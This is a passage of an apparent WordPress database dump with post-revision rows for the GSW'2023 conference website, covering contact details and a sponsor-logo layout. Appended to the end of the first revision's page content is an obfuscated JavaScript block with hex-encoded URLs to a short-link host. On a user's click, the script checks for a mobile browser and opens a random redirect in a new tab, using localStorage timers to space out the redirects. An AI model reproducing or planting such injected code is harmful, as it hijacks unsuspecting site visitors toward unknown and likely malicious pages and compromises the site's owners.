5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:29:48','2023-08-13 12:29:48','',3066,'https://gsw2023.com/?p=5115',0,'revision','',0),
(5116,1,'2023-08-13 12:30:50','2023-08-13 12:30:50','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" 